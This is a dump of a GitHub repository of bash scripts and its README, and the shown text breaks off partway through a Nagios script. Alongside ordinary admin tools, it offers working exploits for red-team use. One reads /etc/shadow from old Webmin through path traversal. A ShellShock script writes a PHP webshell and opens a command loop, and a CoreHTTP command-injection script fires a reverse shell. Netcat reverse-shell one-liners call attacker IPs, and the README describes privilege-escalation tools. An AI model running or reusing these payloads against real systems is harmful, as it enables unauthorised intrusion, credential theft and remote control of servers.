├── CVE-2006-3392.sh
├── CVE-2014-6271.sh
├── LICENSE
├── MountDriveVMWworkstation.sh
├── PreventSleeping.sh
├── README.md
├── absolutepathit.sh
├── absolutepathit_img.png
├── absolutepathit_img2.png
├── change-apache2-user.sh
├── cloudflare-ddns-update.sh
├── corehttp-rev-shell.png
├── corehttp-rev-shell.sh
├── create_nagios_monitor.sh
├── cve20063392.png
├── dnslookup.sh
├── enablespoofing.sh
├── enum_dns_servers.sh
├── forgot_command.sh
├── generate_all_uppercase_lowercase_combos_for_a_word.sh
├── getip.sh
├── getip_img.png
├── gitea-update.sh
├── kali-setup.sh
├── lxd_privesc.sh
├── massnmp.png
├── massnmp.sh
├── newusercheck.sh
├── pingsweep.sh
├── pingsweep_img.png
├── portscan.sh
├── portscan_img.png
├── rcp-suid-privesc.sh
├── readid.sh
├── readid_img.png
├── renew_wildcard_cert_cf_dns.sh
├── replace_nagioscore_logo.sh
├── rfi-rce.png
├── rfi-rce.sh
├── shellshock.png
├── suidcheck.sh
├── update-nagios-core.sh
└── update-ssl-certificate.sh


/CVE-2006-3392.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # CVE-2006-3392 
 3 | # Exploit Webmin < 1.29x
 4 | # Arbitrary File Disclosure
 5 | 
 6 | # Allow Ctrl+C to kill pingsweep
 7 | trap '
 8 |   trap - INT # restore default INT handler
 9 |   kill -s INT "$$"
10 | ' INT
11 | 
12 | if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
13 | 		# This option displays a help message and command execution examples
14 | 		echo ""
15 | 		echo "OsbornePro CVE-2006-3392 1.0 ( https://roberthosborne.com )"
16 | 		echo ""
17 | 		echo "USAGE: ./CVE-2006-3392.sh <target_ip> <port> http|https <path_to_file>"
18 | 		echo ""
19 | 		echo "OPTIONS:"
20 | 		echo "  -h : Displays the help information for the command."
21 | 		echo ""
22 | 		echo "EXAMPLES:"
23 | 		echo "  ./CVE-2006-3392.sh 10.10.10.141 80 http /etc/shadow"
24 | 		echo "  # This example reads /etc/shadow from the target 10.10.10.141"
25 | 		echo ""
26 | 		echo "  ./CVE-2006-3392.sh 10.10.10.141 443 https /etc/shadow"
27 | 		echo "  # This example reads /etc/shadow from the target 10.10.10.141 using HTTPS"
28 | 		echo ""
29 | 		exit
30 | # Variable validation------------------------------------------------
31 | elif [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] || ERROR="Valid IP address was not defined. For more help use the -h option"; then
32 | 		
33 | 		# Validate first parameter was defined correctly
34 | 		if [ ! $ERROR ]; then
35 | 			# Validate correct amount of positional parameters are defined
36 | 			if [ -n "$5" ]; then
37 | 				echo "Too many positional parameters have been defined. Execute './CVE-2006-3392.sh -h' for help"
38 | 				echo ""
39 | 				exit
40 | 			fi
41 | 		else
42 | 			echo $ERROR
43 | 			echo ""
44 | 			exit
45 | 		fi
46 | 		# Validate positional parameter 2 is an integer between 1 and 65535
47 | 		if [ "$2" -lt 65535 ] && [ "$2" -ge 1 ] || ERROR="The port you defined needs to be an integer between 1 and 65535"; then
48 | 			if [ ! $ERROR ]; then
49 | 				PORT=$2
50 | 			else
51 | 				echo $ERROR
52 | 				echo ""
53 | 				exit
54 | 			fi
55 | 		fi
56 | 		# Validate positional parameter 3 is http or https
57 | 		PROTOCOL=$(tr "[:upper:]" "[:lower:]" <<< "$3")
58 | 		if [ "$PROTOCOL" == "http" ] || [ "$PROTOCOL" == "https"]; then
59 | 			:
60 | 		else
61 | 		        ERROR="Third parameter needs to be http or https"
62 | 			if [ ! $ERROR ]; then
63 | 				echo $ERROR
64 | 				echo ""
65 | 				exit
66 | 			fi
67 | 		fi
68 | 		# If the file does not exist on the target curl will return a 404 error
69 | fi
70 | 
71 | REPEAT='/..%01'
72 | PAYLOAD=$(for i in $(seq 1 40); do echo -ne ${REPEAT}; done)
73 | URI="unauthenticated${PAYLOAD}"
74 | URL="${PROTOCOL}://${1}:${PORT}/${URI}${4}"
75 | 
76 | if [ $PROTOCOL == 'https' ]; then
77 | 	curl -k -sL $URL -m 10
78 | 	echo "${URL}"
79 | elif [ $PROTOCOL == 'http' ]; then
80 | 	curl -sL $URL -m 10
81 | else
82 | 	printf "I don't know what you did. Whatever it was was just wrong :)\n"
83 | fi
84 | 


--------------------------------------------------------------------------------
/CVE-2014-6271.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # CVE-2014-6271 : ShellShock Exploit
 3 | # https://nvd.nist.gov/vuln/detail/CVE-2014-6271
 4 | # This tool uses ShellShock to upload a webshell to the target and uses curl to execute commands through that webshell to provide a terminal like experience.
 5 | #
 6 | trap '
 7 |   trap - INT # restore default INT handler
 8 |     kill -s INT "$$"
 9 |     ' INT
10 | 
11 | if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
12 |                 # This option displays a help message and command execution examples
13 |                 echo ""
14 |                 echo "OsbornePro CVE-2014-6271 1.0 ( https://roberthosborne.com )"
15 |                 echo ""
16 |                 echo "USAGE: CVE-2014-6271 -i <target ip> -p <port> -u <uri>"
17 |                 echo ""
18 |                 echo "OPTIONS:"
19 |                 echo "  -h : Displays the help information for the command."
20 |                 echo "  -i : Defines the ip address of the target"
21 |                 echo "  -p : Defines the port the web server is running on"
22 |                 echo "  -u : Defines the URI that is exploitable to ShellShock"
23 |                 echo ""
24 |                 echo "EXAMPLES:"
25 |                 echo "  CVE-2014-6271 -i 10.10.10.10 -p 8080 -u '/cgi-bin/index.cgi'"
26 |                 echo "  # This example exploits shell shock at http://10.10.10.10.:8080/cgi-bin/index.cgi"
27 |                 echo ""
28 |                 exit
29 | fi
30 | 
31 | while getopts ":i:p:u:" OPT; do
32 |         case $OPT in
33 |                 i) ip=$OPTARG;;
34 |                 p) port=$OPTARG;;
35 | 		u) uri=$OPTARG;;
36 |         esac
37 | done
38 | 
39 | if [ -z "$ip" ]
40 | then
41 | 	printf "[!] Please define the ip address or hostname of the target\n"	
42 | 	exit
43 | fi
44 | 
45 | if [ -z "$port" ]
46 | then
47 | 	printf "[*] A valid port was not defined\nSetting default value to 80"
48 | 	port=80
49 | fi
50 | 
51 | if [ -z "$uri" ]
52 | then
53 | 	printf "[*] No uri was defined. Setting default value to /cgi-bin/index.cgi\n"
54 | 	uri="/cgi-bin/index.cgi"
55 | fi
56 | 
57 | printf "[*] Sending exploit...\n"
58 | 
59 | # Encoded in base64 <html><head><h1>tobor</h1></head><body><p><?php echo '<pre>' . shell_exec($_GET ['cmd']) . '</pre>' ;?></p></body></html>
60 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo -en \"PGh0bWw+PGhlYWQ+PGgxPnRvYm9yPC9oMT48L2hlYWQ+PGJvZHk+PHA+PD9waHAgZWNobyAnPHByZT4nIC4gc2hlbGxfZXhlYygkX0dFVCBbJ2NtZCddKSAuICc8L3ByZT4nIDs/PjwvcD48L2JvZHk+PC9odG1sPg==\"| base64 -d > /var/www/html/simple.php'" http://${ip}:${port}${uri} && printf "Webshell has been created at /var/www/html/simple.php\n"
61 | 
62 | if [ "$ssl" ];
63 | then
64 | 	while :; do
65 | 		printf "[php-web-shell>]"
66 | 		read CMD
67 | 		curl -sL -k https://$ip:$port/simple.php?cmd=$CMD 2>&1 | sed 's/\(<html><head><h1>tobor<\/h1><\/head><body><p><pre>\|<\/pre>\)//g' | sed 's/\(<\/p><\/body><\/html>\)//g'
68 | 		done
69 | else
70 | 	while :; do
71 | 		printf "[php-web-shell>]"
72 | 		read CMD
73 | 		curl -sL http://$ip:$port/simple.php?cmd=$CMD 2>&1 | sed 's/\(<html><head><h1>tobor<\/h1><\/head><body><p><pre>\|<\/pre>\)//g' | sed 's/\(<\/p><\/body><\/html>\)//g'
74 | 	done
75 | fi
76 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 tobor
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/MountDriveVMWworkstation.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # CREATED ON: Linux kali 5.10.0-kali2-amd64 #1 SMP Debian 5.10.9-1kali1 (2021-01-22) x86_64 GNU/Linux
 3 | # This script is used to mount the Type 2 Hypervisor VMWare Workstation's "shared folder" to /media/hgfs/Shared
 4 | # The shared folder that gets mapped is the one configured by right clicking your VM in VMWare Worksations library > Going to Settings > Options tab > View the Shared Folder Setting
 5 | #
 6 | # NOTE: I made this on a Kali machine. If you wish to remove the absolute paths to the below commands issue the below command I have commented out which will update the file for working with different Linux Distros
 7 | # sed -i 's|/usr/bin/||g' MountDriveVMWworkstation.sh
 8 | 
 9 | 
10 | if [ ! -d /media/hgfs ]; then
11 |         /usr/bin/printf "Creating the folder /media/hgfs\n"
12 |         /usr/bin/sudo /usr/bin/mkdir /media/hgfs && /usr/bin/chmod 555 /media/hgfs
13 | fi
14 | 
15 | 
16 | if [ ! -d /media/hgfs/Share ]; then
17 |         /usr/bin/printf "Mounting Share to /media/hgfs/Share\n"
18 |         /usr/bin/sudo /usr/bin/mount -t fuse.vmhgfs-fuse .host:/ /media/hgfs
19 | else
20 |         /usr/bin/printf "Share is already mapped to /media/hgfs\n"
21 | fi
22 | 


--------------------------------------------------------------------------------
/PreventSleeping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # This script is used to quickly and easily prevent your Linux Debian based distro from falling asleep
3 | 
4 | /usr/bin/xset s off
5 | /usr/bin/xset -dpms
6 | /usr/bin/xset s noblank
7 | 
8 | /usr/bin/echo "[*] Sleeping has been turned off"
9 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Bash
  2 | Collection of bash tools I wrote to make my life easier or test myself. The help switch defined for these scripts is written with the assumption these exist in a PATH environmnet variable. Typically commands such as these should be placed in /usr/local/bin. This is considered best practice for Linux. Most of these tools will be useful to Red Teamers.
  3 | 
  4 | ## ADD COMMANDS TO /usr/local/bin
  5 | Enter the below commands to download this repo, make the .sh files executable and place the .sh executable files into your /usr/local/bin so you can use for example "getip" instead of ./getip.sh to execute the commands.
  6 | ```sh
  7 | git clone https://github.com/tobor88/Bash
  8 | cd Bash
  9 | sudo chmod u+x *.sh
 10 | files=$(ls *.sh)
 11 | for f in $files; do cp "$f" /usr/local/bin/"${f%.sh}"; done
 12 | ```
 13 | ---
 14 | #### BASH EXPLOITS
 15 | - __CVE-2014-6271.sh__ This exploit is used to execute commands on a remote server vulnerable to the CVE-2014-6271 ShellShock vulnerability. It creates a webshell at /var/www/html/simple.php and uses curl to simulate a shell like session. Currently only able to issue one word commads. I plan adding more functionality in the future.
 16 | ![ShellShock CVE-2015-6271](https://raw.githubusercontent.com/tobor88/Bash/master/shellshock.png)
 17 | 
 18 | - __CVE-2006-3392.sh__ This exploit is used to perform an unauthenticated remote file disclosure on Webmin version <1.29x.
 19 | ```bash
 20 | ./CVE-2006-3392.sh 10.11.1.141 10000 http /etc/shadow
 21 | ```
 22 | ![CVE-2006-3392](https://raw.githubusercontent.com/tobor88/Bash/master/cve20063392.png)
 23 | 
 24 | - __LXD Privilege Escalation__ This exploit can be used to escalate privileges in a Linux environment where the user is a member of the lxd group. 
 25 | ```bash
 26 | # Example Usage:
 27 | ./lxd_privesc.sh container01
 28 | # RESULTS
 29 | Device rootdisk added to container01
 30 | Device rootdisk removed from container01
 31 | [*] Execution completed
 32 | uid=0(root) gid=0(root) groups=0(root)
 33 | root@example:/dev/shm/.tobor# exit
 34 | ```
 35 | 
 36 | - __CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution__ This exploit is used to obtain a reverse shell from a remote server hosting a CoreHTTP instance version 0.5.3.1 or lower. CoreHTTP server fails to properly sanitize input before calling the popen() function in http.c. Define a reverse shell to execute. I have a common list on my site [Reverse Shells Here](https://roberthosborne.com/reverse-shells)
 37 | ```bash
 38 | # Example Usage:
 39 | ./corehttp-rev-shell.sh -u 'http://10.11.1.2:10443/foo.pl' -s 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.172 1338 >/tmp/f'
 40 | ```
 41 | ![corehttp-reverse-shell](https://raw.githubusercontent.com/tobor88/Bash/master/corehttp-rev-shell.png)
 42 | 
 43 | - __rfi-rce.sh__ This is a command that can be used to simplify RCE through a remote file inclusion vulnerability by exploiting it in a shell like fashion.
 44 | ```bash
 45 | rfi-rce -f /var/www/html/evil.txt -u "http://target-ip/section.php?page=http://attacker-ip/evil.txt"
 46 | ```
 47 | ![rfi-rce.sh](https://raw.githubusercontent.com/tobor88/Bash/master/rfi-rce.png)
 48 | 
 49 | ---
 50 | #### BASH COMMANDS
 51 | - __readid.sh__ This is complete. (Disaplys the /etc/passwd, /etc/shadow, or /etc/group files into an easy to read format)
 52 | 
 53 | ![readid.sh results](https://raw.githubusercontent.com/tobor88/Bash/master/readid_img.png)
 54 | 
 55 | 
 56 | - __getip.sh__ I view this as done. (Restrieves and displays the public and private IP addresses on a computer)
 57 | 
 58 | ![getip.sh results](https://raw.githubusercontent.com/tobor88/Bash/master/getip_img.png)
 59 | 
 60 | 
 61 | - __pingsweep.sh__ This works best when fping is installed on your Linux distro. If fping is not installed it will failover to using the ping command instead. The timeout for ping is set to 1 second so if you are using this with proxychains you may need to mess around with this setting.
 62 | 
 63 | ![pingsweep.sh results](https://raw.githubusercontent.com/tobor88/Bash/master/pingsweep_img.png)
 64 | 
 65 | 
 66 | - __portscan.sh__ In the future I will add more input validation and error handling. (Custom port scanner. Check all ports, one port, or a custom range of ports.)
 67 | 
 68 | ![portscan.sh results](https://raw.githubusercontent.com/tobor88/Bash/master/portscan_img.png)
 69 | 
 70 | 
 71 | - __massnmp.sh__ Script I built to quickly obtain SNMP information from a defined subnet range. This was written for Kali so it uses OneSixtyOne and SNMP-Check. If these are not already installed they will need to be for the script to work. This script will build 3 files in your /tmp directory which means on next restart they will be deleted. Enumerated SNMP info on different targets will be placed into a txt file in the $PWD the script was executed from.
 72 | 
 73 | ![massnmp.sh results](https://raw.githubusercontent.com/tobor88/Bash/master/massnmp.png)
 74 | 
 75 | 
 76 | - __absolutepathit.sh__ This command is used to convert all relative commands in a script to absolute path commands. To play this one safe I have it create a copy of the script you wrote and places it in a file called /tmp/absolutepathit_tmpinfo. This file has all comments removed from it and replaces any commands that have a result value obtained from the command $(which <cmd>) with the absolute path value result for that command. 
 77 |  Copy and paste the results into your script to ensure you dont lost your comments and to ensure any possible command words you have in echo quotations are what you want. 
 78 |  This is not perfect yet as you can see in the image below it misses curl.
 79 |  
 80 |  ![absolutepathit.sh results](https://raw.githubusercontent.com/tobor88/Bash/master/absolutepathit_img.png) 
 81 | 
 82 |  To deal with that issue I added line 40 which will obtain commands that are located next to a ( character. This does not misinterpret _print_ in the __awk__ command. 
 83 |  
 84 |  ![absolutepathit.sh results improvement](https://raw.githubusercontent.com/tobor88/Bash/master/absolutepathit_img2.png)
 85 |  
 86 |  The issue I noticed came from another script came from a website in the bash script. This is because the slash is viewed as an escape character. Any contributions are welcome. This is still a work in progress.
 87 | 
 88 | - __MountDriveVMWworkstation.sh__ This is a simple script meant to be executed in order to quickly mount a defined Shared Folder in VMWare Workstation to a Linux VM running inside VMWare Workstation.
 89 | ```sh
 90 | ./MountDriveVMWworkstation.sh 
 91 | ```
 92 | 
 93 | - __newusercheck.sh__ This is a simple script to send an email alert whenever a new user is added to an /etc/passwd file on the local machine
 94 |  
 95 | - __PreventSleeping.sh__ This is a simple script to prevent a Debian based Linux Distro from falling asleep
 96 | ```sh
 97 | ./PreventSleeping.sh
 98 | ```
 99 | 
100 | - __enablespoofing.sh__ This is a simple script meant to take care of the tasks neccessary to allow dns spoofing on Kali Linux. It enables port forwarding on ipv4 and allows DNS traffic.
101 | 
102 | - __dnslookup.sh__ This command is meant to perform a mas dns lookup based on an IPv4 address range. Returns output in the below format
103 | ```sh
104 | --------------------------------------------
105 | | IP Address              |     FQDN's     |
106 | --------------------------------------------
107 | 2.2.0.10.in-addr.arpa DC.osbornepro.com.
108 | 4.2.0.10.in-addr.arpa DEV.osbornepro.com.
109 | ```
110 | 
111 | - __enum_dns_servers.sh__ This command is meant to return the DNS servers in a domain. This is most useful when having a local domains DNS server set in your /etc/resolv.conf file.
112 | ```sh
113 | ---------------
114 | | DNS Servers |
115 | ---------------
116 | dns1.osbornepro.com.
117 | dns2.osbornepro.com.
118 | ```
119 | - __rcp-suid-privesc.sh__ This can be used to exploit the SUID bit on rcp. This only works on certain Operating Systems. Successfully tested on Red Hat 6.2. THere is a perl version of this script on exploitdb.
120 | 
121 | - __suidcheck.sh__ Needs a lot of work (Checks for exploitable suid bits and attempts to exploit them if they exist. Also returns cron job scripts)
122 | 


--------------------------------------------------------------------------------
/absolutepathit.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | 
 4 | REGEX="^[a-z ]"
 5 | USAGE='OsbornePro absolutepathit 2.0 ( https://osbornepro.com )
 6 | 
 7 | Usage: absolutepathit [file <string /path/to/script]
 8 | 
 9 | OPTIONS:"
10 |  -h : Displays the help information for the command.
11 | 
12 | EXAMPLES:
13 |   absolutepathit ~/Documents/Bash/script.sh"
14 |   # This example takes the words in script.sh and changes relative paths to absolute paths.
15 |   
16 | '
17 | 
18 | 
19 | function allow_ctrlc {
20 | 
21 | 	# Allow Ctrl+C to kill pingsweep
22 | 	trap '
23 | 	  trap - INT # restore default INT handler
24 | 	  kill -s INT "$$"
25 | 	' INT
26 | 
27 | }  # End allow_ctrlc
28 | 
29 | 
30 | function print_usage {
31 | 
32 | 	printf "$USAGE\n" >&2
33 | 	exit 1
34 | 
35 | }  # End function print_usage	
36 | 
37 | 
38 | function validate_file {
39 | 
40 | 	# Validate script to absoulte path exists
41 | 	if [ -f "$script" ] && echo "$script file exists. Please wait..." || echo "$script file does not exist. Please define the path to the script you wish to add absolute command values too."; then
42 | 		declare -a ABSOLUTE_CMDS
43 | 	else
44 | 		printf "[x] The file path defined does not exist or you have inadequate permissions."
45 | 		exit 1
46 | 	fi
47 | 
48 | }  # End function validate_file
49 | 
50 | 
51 | while [ ! -z "$1" ]; do
52 | 	case "$1" in
53 | 		-f)
54 | 			shift
55 | 			script=$1
56 | 			;;
57 | 		*)
58 | 			print_usage
59 | 			;;
60 | 	esac
61 | shift
62 | done
63 | 
64 | 
65 | allow_ctrlc
66 | validate_file
67 | 
68 | # Ignore lines that are commented out
69 | cp "$script" /tmp/absolutepathit_tmpinfo
70 | sed -i -e 's/#.*$//' -e '/^$/d' /tmp/absolutepathit_tmpinfo
71 | 
72 | # Build an array of possible absolute path values in a script
73 | mapfile -t COMMAND_LIST < /tmp/absolutepathit_tmpinfo
74 | 
75 | UNIQUE_CMDS=$(echo ${COMMAND_LIST[@]} | tr ' ' '\n' | sort -u | tr '\n' ' ')
76 | 
77 | # Comment out the below line that sets the word variable if you feel this is overdoing it. This is still a work in progress
78 | word=$(echo $word | rev | cut -f1 -d '(' | rev)
79 | 
80 | for word in $UNIQUE_CMDS; do
81 | 	if [[ $word =~ $REGEX ]]; then
82 | 		if [ -n $word ]; then
83 | 			THECMD=$(which "$word")
84 | 			if [ "$THECMD" != "" ]; then
85 | 				echo "$THECMD is being added to array of commands"
86 | 				ABSOLUTE_CMDS+=($THECMD) 
87 | 			fi
88 | 		fi
89 | 	fi
90 | done
91 | 
92 | echo "$ABSOLUTE_CMDS"
93 | 	
94 | # Replace the arelative value commands in a script with absolute values
95 | for each_command in ${ABSOLUTE_CMDS[@]}; do
96 | 	assumed_path=${each_command##*/}
97 | 	sed -i "s|$assumed_path|$each_command|g" /tmp/absolutepathit_tmpinfo
98 | done	
99 | 


--------------------------------------------------------------------------------
/absolutepathit_img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/absolutepathit_img.png


--------------------------------------------------------------------------------
/absolutepathit_img2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/absolutepathit_img2.png


--------------------------------------------------------------------------------
/change-apache2-user.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # OsbornePro LLC.
 3 | #
 4 | # This was made to run as root on Linux Mint with Version info below. Other OS's may require different values
 5 | # Linux 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 6 | # Description:    Linux Mint 20.1
 7 | # Release:        20.1
 8 | # Codename:       ulyssa
 9 | 
10 | 
11 | USERFILES=$(/usr/bin/find / -user www-data 2>/dev/null)
12 | GROUPFILES=$(/usr/bin/find / -group www-data 2>/dev/null)
13 | 
14 | /bin/echo "[*] Creating group 'apache' to be used by the apache2.service"
15 | /usr/sbin/groupadd apache
16 | 
17 | /bin/echo "[*] Creating user 'apache' to be used by the apache2.service"
18 | /usr/sbin/useradd apache -g apache -d /dev/null -s /usr/sbin/nologin
19 | 
20 | /bin/echo "[*] Changing group ownership permissions of apache directories"
21 | for g in $GROUPFILES; do
22 |     /bin/chgrp apache $g
23 | done
24 | 
25 | /bin/echo "[*] Changing user ownership permissions of apache directories"
26 | for u in $USERFILES; do
27 |     /bin/chown apache $u
28 | done
29 | 
30 | /bin/echo "[*] Replacing the www-data user in /etc/apache2/envvars with the newly created 'apache' user id"
31 | /bin/sed -i 's/www-data/apache/g' /etc/apache2/envvars
32 | 
33 | /bin/echo "[*] Restarting the apache2 service"
34 | /bin/systemctl restart apache2
35 | 


--------------------------------------------------------------------------------
/cloudflare-ddns-update.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # A bash script to update a Cloudflare DNS A record using the external IP of the local machine
 3 | #
 4 | # CRONJOB EXAMPLE
 5 | # crontab -e
 6 | # 0 9 * * * /bin/bash /usr/share/scripts/ddns-update.sh
 7 | 
 8 | ZONE=domain.com
 9 | DNSRECORD=subdomain.domain.com
10 | CLOUDFLARE_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
11 | IPV4REGEX="[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
12 | IP=$(/usr/bin/curl -s -X GET https://cloudflare.com/cdn-cgi/trace | grep ip | cut -d"=" -f2)
13 | DNS_IP_TRANSLATION=$(/usr/bin/host $DNSRECORD 1.1.1.1 | /bin/grep "has address" | /bin/grep "$IP" | egrep -o $IPV4REGEX)
14 | 
15 | /bin/echo "[*] Current IPv4 Address: $IP"
16 | if [ $IP == $DNS_IP_TRANSLATION ]; then
17 | 
18 | 	/bin/echo "[*] $DNSRECORD is currently set to $IP, no changes needed"
19 | 
20 | else
21 | 
22 | 	ZONEID=$(/usr/bin/curl -s -X GET "https://api.cloudflare.com/client/v4/zones?name=$ZONE&status=active" -H "Authorization: Bearer ${CLOUDFLARE_KEY}" -H "Content-Type: application/json" | /usr/bin/jq -r '{"result"}[] | .[0] | .id')
23 | 
24 | 	/bin/echo "[*] Zone    : $ZONE"
25 |   /bin/echo "[*] Zone ID : $ZONEID"
26 | 	DNSRECORDID=$(/usr/bin/curl -s -X GET "https://api.cloudflare.com/client/v4/zones/$ZONEID/dns_records?type=A&name=$DNSRECORD" -H "Authorization: Bearer ${CLOUDFLARE_KEY}" -H "Content-Type: application/json" | /usr/bin/jq -r '{"result"}[] | .[0] | .id')
27 | 
28 | 	/bin/echo "[*] DNS Record    : $DNSRECORD"
29 |   /bin/echo "[*] DNS Record ID : $DNSRECORDID"
30 | 	/usr/bin/curl -s -X PUT "https://api.cloudflare.com/client/v4/zones/$ZONEID/dns_records/$DNSRECORDID" -H "Authorization: Bearer ${CLOUDFLARE_KEY}" -H "Content-Type: application/json" --data "{\"type\":\"A\",\"name\":\"$DNSRECORD\",\"content\":\"$IP\",\"ttl\":1,\"proxied\":false}" | /usr/bin/jq -r '.result'
31 | 
32 | fi
33 | 


--------------------------------------------------------------------------------
/corehttp-rev-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tobor88/Bash/d85ae7d3c5bf9db82797fafa2d0c40ca27babb17/corehttp-rev-shell.png


--------------------------------------------------------------------------------
/corehttp-rev-shell.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Remote Command Execution
 3 | # CoreHTTP Server Version 0.5.3.1 and Below
 4 | #
 5 | # This command is used to obtain a reverse shell.
 6 | # CoreHTTP server fails to properly sanitize input before calling  the popen()
 7 | # function in http.c. This allows an attacker to execute arbitrary commands
 8 | 
 9 | # Allow Ctrl+C to kill pingsweep
10 | trap '
11 |   trap - INT # restore default INT handler
12 |   kill -s INT "$$"
13 | ' INT
14 | 
15 | if [ -z "$1" ] || [ "$1" == '-h' ] || [ "$1" == '--help' ] ; then
16 |                 # This option displays a help message and command execution examples
17 |                 echo ""
18 |                 echo "OsbornePro corehttp-rev-shell 1.0 ( https://osbornepro.com )"
19 |                 echo ""
20 |                 echo "USAGE:  -p <port> -u <url> -c <curl options>"
21 |                 echo ""
22 |                 echo "OPTIONS:"
23 |                 echo "  -h : Displays the help information for the command."
24 |                 echo "  -u : Define the full URL location to foo.pl"
25 | 		echo "  -c : Set options available in curl to adjust to a variety of situations"
26 |                 echo "  -s : Reverse shell command to execute. Other commands will work but they will not return any results"
27 |                 echo ""
28 |                 echo "EXAMPLES:"
29 |                 echo "  corehttp-rev-shell -u 'https://10.10.10.11:10443/dev/foo.pl' -p 10443 -c '--insecure' -s 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f'"
30 |                 echo "  # This example executes a netcat OpenBSD reverse shell from 10.10.10.11 to your attack machine on port 1337."
31 |                 echo ""
32 |                 exit
33 | fi
34 | 
35 | while getopts ":c:u:s:" OPT; do
36 |         case $OPT in
37 |                 u) url=$OPTARG;;
38 |                 c) cmd=$OPTARG;;
39 | 		s) shell=$OPTARG;;
40 |         esac
41 | done
42 | 
43 | if [[ -z $url ]]; then
44 |         printf "[!] URL was not defined\n"
45 |         exit
46 | fi
47 | 
48 | if [[ -z $cmd ]]; then 
49 | 	printf "[!] A reverse shell command was not defined\n"
50 | fi
51 | 
52 | rawurlencode() {
53 |   local string="${1}"
54 |   local strlen=${#string}
55 |   local encoded=""
56 |   local pos c o
57 | 
58 |   for (( pos=0 ; pos<strlen ; pos++ )); do
59 |      c=${string:$pos:1}
60 |      case "$c" in
61 |         [-_.~a-zA-Z0-9] ) o="${c}" ;;
62 |         * )               printf -v o '%%%02x' "'$c"
63 |      esac
64 |      encoded+="${o}"
65 |   done
66 |   echo "${encoded}"    # You can either set a return variable (FASTER) 
67 |   REPLY="${encoded}"   #+or echo the result (EASIER)... or both... :p
68 | }
69 | SHELL=$(rawurlencode "$shell")
70 | URL=${url}"?%60"$SHELL"%26%60"
71 | 
72 | # printf "Sending request to $URL"
73 | 
74 | curl ${curlopts} "${URL}"
75 | 


--------------------------------------------------------------------------------
/create_nagios_monitor.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | USAGE="
  4 | 
  5 | SYNTAX: $0 [-h] -H <hostname> [-i <string ipv4 address>] [-f <string template file path>]
  6 | 
  7 | 
  8 | DESCRIPTION:
  9 |    This script is used to duplicate a Nagios monitoring template in Nagios Core. 
 10 |    After running this script you can start monitoring your newly created device.
 11 | 
 12 | 
 13 | REQUIREMENTS:
 14 |    1.) Template file should NOT end with a .cfg extension to prevent extraneous monitor. New file is saved to same location as the template file
 15 |    2.) Use the cfg_dir value in /usr/local/nagios/etc/nagios.cfg to define a directory(s) where cfg files become monitoring files
 16 |    3.) Uses the following default values which this script replaces in the template files. These are the default values of these config files
 17 |       a.) LINUX: localhost.cfg hostname localhost gets replaced and IP 192.168.1.2 gets replaced
 18 |       b.) WINDOWS: windows.cfg hostname winserver gets replaced and IP 192.168.1.2 gets replaced and Alias My Windows Server gets replaced
 19 |       c.) PRINTERS: printer.cfg hostname hplj2605dn gets replaced and IP 192.168.1.2 gets replaced and Alias HP LaserJet 2605dn gets replaced
 20 | 
 21 | 
 22 | CONTACT INFORMATION
 23 |    Company: OsbornePro LLC.
 24 |    Website: https://osbornepro.com 
 25 |    Author: Robert H. Osborne
 26 |    Contact: rosborne@osbornepro.com
 27 | 
 28 | 
 29 | USAGE: $0 -H <hostname> [-i <ipv4 address>] [-f <template file path>]
 30 | 
 31 |     OPTIONS:
 32 |   	-h : Displays the help information for the command.
